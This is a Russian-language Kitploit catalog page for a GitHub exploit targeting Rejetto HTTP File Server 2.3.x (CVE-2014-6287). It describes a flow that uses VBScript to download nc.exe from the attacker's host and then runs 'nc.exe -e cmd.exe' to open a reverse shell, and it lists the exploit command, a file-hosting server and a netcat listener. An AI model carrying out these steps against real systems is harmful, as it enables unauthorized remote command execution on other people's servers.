Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — Эксплойт удаленного выполнения команд для Rejetto HTTP File Server 2.3.x (CVE-2014-6287), переписанный на Python 3 для современного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеИнструмент Удаленного Доступа

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

Эксплойт удаленного выполнения команд для Rejetto HTTP File Server 2.3.x (CVE-2014-6287), переписанный на Python 3 для современного тестирования на проникновение.

Репозиторий
8 месяцев назадЕщё не проверено

HFS Remote Command Execution Exploit (CVE-2014-6287)

Это переписанная на Python 3 версия классического эксплойта удалённого выполнения команд (RCE), нацеленного на Rejetto HTTP File Server (HFS) v2.3.x, использующая уязвимость, обозначенную как CVE-2014-6287.

Первоначально обнаружена Avinash Kumar Thapa aka "-Acid", эта версия улучшает переносимость и удобство использования, предоставляя полную параметризацию и современную совместимость.


⚠️ Отказ от ответственности

Данный инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования на проникновение. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно и неэтично.


📌 Детали эксплойта

  • Уязвимость: Rejetto HFS v2.3.x - Удалённое выполнение команд
  • CVE: CVE-2014-6287
  • Воздействие: Удалённое выполнение кода с привилегиями системы
  • Требование: Цель должна работать под уязвимой версией HFS с включёнными скриптами.

🚀 Возможности

  • Полная совместимость с Python 3
  • Принимает все ключевые параметры через CLI:
    • IP-адрес и порт цели
    • Локальный IP-адрес (атакующего)
    • Порт прослушивания для обратной оболочки
    • Порт для хостинга nc.exe
  • Отсутствие жёстко заданных значений
  • Классическая доставка обратной оболочки nc.exe с помощью VBScript
  • Поток выполнения эксплойта:
    1. Загрузка VBScript для скачивания nc.exe
    2. Выполнение VBScript на целевой системе
    3. Запуск nc.exe -e cmd.exe для установки обратной оболочки

🛠️ Использование

root@kitploit:~
python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>

Пример:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000

Требования:
  - HTTP-сервер, раздающий nc.exe:
      python3 -m http.server 8000
  - Прослушиватель:
      nc -lvnp 4444
Скачать инструмент